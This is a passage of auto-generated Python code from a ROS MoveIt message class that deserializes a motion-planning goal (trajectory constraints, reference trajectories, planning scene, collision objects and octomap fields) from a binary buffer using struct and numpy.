+= 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v521.frame_id = str[start:end].decode('utf-8') else: _v521.frame_id = str[start:end] _v523 = val2.orientation _x = _v523 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.link_name = str[start:end].decode('utf-8') else: val2.link_name = str[start:end] _x = val2 start = end end += 32 (_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight,) = _get_struct_4d().unpack(str[start:end]) val1.orientation_constraints.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.visibility_constraints = [] for i in range(0, length): val2 = moveit_msgs.msg.VisibilityConstraint() start = end end += 8 (val2.target_radius,) = _get_struct_d().unpack(str[start:end]) _v524 = val2.target_pose _v525 = _v524.header start = end end += 4 (_v525.seq,) = _get_struct_I().unpack(str[start:end]) _v526 = _v525.stamp _x = _v526 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v525.frame_id = str[start:end].decode('utf-8') else: _v525.frame_id = str[start:end] _v527 = _v524.pose _v528 = _v527.position _x = _v528 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v529 = _v527.orientation _x = _v529 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) start = end end += 4 (val2.cone_sides,) = _get_struct_i().unpack(str[start:end]) _v530 = val2.sensor_pose _v531 = _v530.header start = end end += 4 (_v531.seq,) = _get_struct_I().unpack(str[start:end]) _v532 = _v531.stamp _x = _v532 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v531.frame_id = str[start:end].decode('utf-8') else: _v531.frame_id = str[start:end] _v533 = _v530.pose _v534 = _v533.position _x = _v534 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v535 = _v533.orientation _x = _v535 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _x = val2 start = end end += 25 (_x.max_view_angle, _x.max_range_angle, _x.sensor_view_direction, _x.weight,) = _get_struct_2dBd().unpack(str[start:end]) val1.visibility_constraints.append(val2) self.goal.request.trajectory_constraints.constraints.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.request.reference_trajectories = [] for i in range(0, length): val1 = moveit_msgs.msg.GenericTrajectory() _v536 = val1.header start = end end += 4 (_v536.seq,) = _get_struct_I().unpack(str[start:end]) _v537 = _v536.stamp _x = _v537 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v536.frame_id = str[start:end].decode('utf-8') else: _v536.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.joint_trajectory = [] for i in range(0, length): val2 = trajectory_msgs.msg.JointTrajectory() _v538 = val2.header start = end end += 4 (_v538.seq,) = _get_struct_I().unpack(str[start:end]) _v539 = _v538.stamp _x = 
_v539 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v538.frame_id = str[start:end].decode('utf-8') else: _v538.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] val2.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v540 = val3.time_from_start _x = _v540 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.joint_trajectory.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.cartesian_trajectory = [] for i in range(0, length): val2 = moveit_msgs.msg.CartesianTrajectory() _v541 = val2.header start = end end += 4 (_v541.seq,) = _get_struct_I().unpack(str[start:end]) _v542 = _v541.stamp _x = _v542 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v541.frame_id = str[start:end].decode('utf-8') else: _v541.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2.tracked_frame = str[start:end].decode('utf-8') else: val2.tracked_frame = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.points = [] for i in range(0, length): val3 = moveit_msgs.msg.CartesianTrajectoryPoint() _v543 = val3.point _v544 = _v543.pose _v545 = _v544.position _x = _v545 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v546 = _v544.orientation _x = _v546 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v547 = _v543.velocity _v548 = _v547.linear _x = _v548 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v549 = _v547.angular _x = _v549 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v550 = _v543.acceleration _v551 = _v550.linear _x = _v551 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v552 = _v550.angular _x = _v552 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v553 = 
val3.time_from_start _x = _v553 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) val2.points.append(val3) val1.cartesian_trajectory.append(val2) self.goal.request.reference_trajectories.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.planner_id = str[start:end].decode('utf-8') else: self.goal.request.planner_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.request.group_name = str[start:end].decode('utf-8') else: self.goal.request.group_name = str[start:end] _x = self start = end end += 28 (_x.goal.request.num_planning_attempts, _x.goal.request.allowed_planning_time, _x.goal.request.max_velocity_scaling_factor, _x.goal.request.max_acceleration_scaling_factor,) = _get_struct_i3d().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.name = str[start:end] _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.joint_state.name.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.position = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.velocity = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.robot_state.joint_state.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.seq, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.header.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.joint_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.Transform() _v554 = val1.translation _x = _v554 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v555 = val1.rotation _x = _v555 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist = [] for i in range(0, length): val1 = geometry_msgs.msg.Twist() _v556 = val1.linear _x = _v556 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v557 = val1.angular _x = _v557 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.twist.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench = [] for i in range(0, length): val1 = geometry_msgs.msg.Wrench() _v558 = val1.force _x = _v558 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v559 = val1.torque _x = _v559 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.multi_dof_joint_state.wrench.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.AttachedCollisionObject() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] _v560 = val1.object _v561 = _v560.header start = end end += 4 (_v561.seq,) = _get_struct_I().unpack(str[start:end]) _v562 = _v561.stamp _x = _v562 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v561.frame_id = str[start:end].decode('utf-8') else: _v561.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v560.id = str[start:end].decode('utf-8') else: _v560.id = str[start:end] _v563 = _v560.type start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) start = end end += length if python3: _v563.key = str[start:end].decode('utf-8') else: _v563.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v563.db = str[start:end].decode('utf-8') else: _v563.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.primitives = [] for i in range(0, length): val3 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val3.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v560.primitives.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.primitive_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v564 = val3.position _x = _v564 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v565 = val3.orientation _x = _v565 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.primitive_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.meshes = [] for i in range(0, length): val3 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.triangles = [] for i in range(0, length): val4 = shape_msgs.msg.MeshTriangle() start = end end += 12 val4.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val3.triangles.append(val4) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val3.vertices = [] for i in range(0, length): val4 = geometry_msgs.msg.Point() _x = val4 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val3.vertices.append(val4) _v560.meshes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.mesh_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v566 = val3.position _x = _v566 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v567 = val3.orientation _x = _v567 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.mesh_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.planes = [] for i in range(0, length): val3 = shape_msgs.msg.Plane() start = end end += 32 val3.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4) _v560.planes.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.plane_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v568 = val3.position _x = _v568 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v569 = val3.orientation _x = _v569 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.plane_poses.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v560.subframe_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v560.subframe_poses = [] for i in range(0, length): val3 = geometry_msgs.msg.Pose() _v570 = val3.position _x 
= _v570 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v571 = val3.orientation _x = _v571 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) _v560.subframe_poses.append(val3) start = end end += 1 (_v560.operation,) = _get_struct_b().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.touch_links = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.touch_links.append(val2) _v572 = val1.detach_posture _v573 = _v572.header start = end end += 4 (_v573.seq,) = _get_struct_I().unpack(str[start:end]) _v574 = _v573.stamp _x = _v574 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v573.frame_id = str[start:end].decode('utf-8') else: _v573.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v572.joint_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val3 = str[start:end].decode('utf-8') else: val3 = str[start:end] _v572.joint_names.append(val3) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) _v572.points = [] for i in range(0, length): val3 = trajectory_msgs.msg.JointTrajectoryPoint() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.positions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.velocities = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.accelerations = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val3.effort = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) _v575 = val3.time_from_start _x = _v575 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2i().unpack(str[start:end]) _v572.points.append(val3) start = end end += 8 (val1.weight,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.attached_collision_objects.append(val1) start = end end += 1 (self.goal.planning_options.planning_scene_diff.robot_state.is_diff,) = _get_struct_B().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.robot_state.is_diff = bool(self.goal.planning_options.planning_scene_diff.robot_state.is_diff) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.robot_model_name = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.fixed_frame_transforms = [] for i in range(0, length): val1 = geometry_msgs.msg.TransformStamped() _v576 = val1.header 
start = end end += 4 (_v576.seq,) = _get_struct_I().unpack(str[start:end]) _v577 = _v576.stamp _x = _v577 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v576.frame_id = str[start:end].decode('utf-8') else: _v576.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.child_frame_id = str[start:end].decode('utf-8') else: val1.child_frame_id = str[start:end] _v578 = val1.transform _v579 = _v578.translation _x = _v579 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v580 = _v578.rotation _x = _v580 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.fixed_frame_transforms.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values = [] for i in range(0, length): val1 = moveit_msgs.msg.AllowedCollisionEntry() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) val1.enabled = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length) val1.enabled = map(bool, val1.enabled) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.entry_values.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1 = str[start:end].decode('utf-8') else: val1 = str[start:end] self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_names.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sB'%length start = end end += struct.calcsize(pattern) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length) self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values = map(bool, self.goal.planning_options.planning_scene_diff.allowed_collision_matrix.default_entry_values) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkPadding() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.padding,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_padding.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) 
self.goal.planning_options.planning_scene_diff.link_scale = [] for i in range(0, length): val1 = moveit_msgs.msg.LinkScale() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.link_name = str[start:end].decode('utf-8') else: val1.link_name = str[start:end] start = end end += 8 (val1.scale,) = _get_struct_d().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.link_scale.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors = [] for i in range(0, length): val1 = moveit_msgs.msg.ObjectColor() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v581 = val1.color _x = _v581 start = end end += 16 (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.object_colors.append(val1) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects = [] for i in range(0, length): val1 = moveit_msgs.msg.CollisionObject() _v582 = val1.header start = end end += 4 (_v582.seq,) = _get_struct_I().unpack(str[start:end]) _v583 = _v582.stamp _x = _v583 start = end end += 8 (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v582.frame_id = str[start:end].decode('utf-8') else: _v582.frame_id = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val1.id = str[start:end].decode('utf-8') else: val1.id = str[start:end] _v584 = val1.type start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v584.key = str[start:end].decode('utf-8') else: _v584.key = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: _v584.db = str[start:end].decode('utf-8') else: _v584.db = str[start:end] start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitives = [] for i in range(0, length): val2 = shape_msgs.msg.SolidPrimitive() start = end end += 1 (val2.type,) = _get_struct_B().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) pattern = '<%sd'%length start = end end += struct.calcsize(pattern) val2.dimensions = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length) val1.primitives.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.primitive_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v585 = val2.position _x = _v585 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v586 = val2.orientation _x = _v586 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.primitive_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.meshes = [] for i in range(0, length): val2 = shape_msgs.msg.Mesh() start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val2.triangles = [] for i in range(0, length): val3 = shape_msgs.msg.MeshTriangle() start = end end += 12 val3.vertex_indices = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=3) val2.triangles.append(val3) start = end end += 4 (length,) = 
_struct_I.unpack(str[start:end]) val2.vertices = [] for i in range(0, length): val3 = geometry_msgs.msg.Point() _x = val3 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) val2.vertices.append(val3) val1.meshes.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.mesh_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v587 = val2.position _x = _v587 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v588 = val2.orientation _x = _v588 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.mesh_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.planes = [] for i in range(0, length): val2 = shape_msgs.msg.Plane() start = end end += 32 val2.coef = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=4) val1.planes.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.plane_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v589 = val2.position _x = _v589 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v590 = val2.orientation _x = _v590 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.plane_poses.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_names = [] for i in range(0, length): start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: val2 = str[start:end].decode('utf-8') else: val2 = str[start:end] val1.subframe_names.append(val2) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) val1.subframe_poses = [] for i in range(0, length): val2 = geometry_msgs.msg.Pose() _v591 = val2.position _x = _v591 start = end end += 24 (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end]) _v592 = val2.orientation _x = _v592 start = end end += 32 (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end]) val1.subframe_poses.append(val2) start = end end += 1 (val1.operation,) = _get_struct_b().unpack(str[start:end]) self.goal.planning_options.planning_scene_diff.world.collision_objects.append(val1) _x = self start = end end += 12 (_x.goal.planning_options.planning_scene_diff.world.octomap.header.seq, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.secs, _x.goal.planning_options.planning_scene_diff.world.octomap.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end]) start = end end += 4 (length,) = _struct_I.unpack(str[start:end]) start = end end += length if python3: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end].decode('utf-8') else: self.goal.planning_options.planning_scene_diff.world.octomap.header.frame_id = str[start:end] _x = self start = end end += 68 (_x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.position.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.x, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.y, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.z, _x.goal.planning_options.planning_scene_diff.world.octomap.origin.orientation.w, 
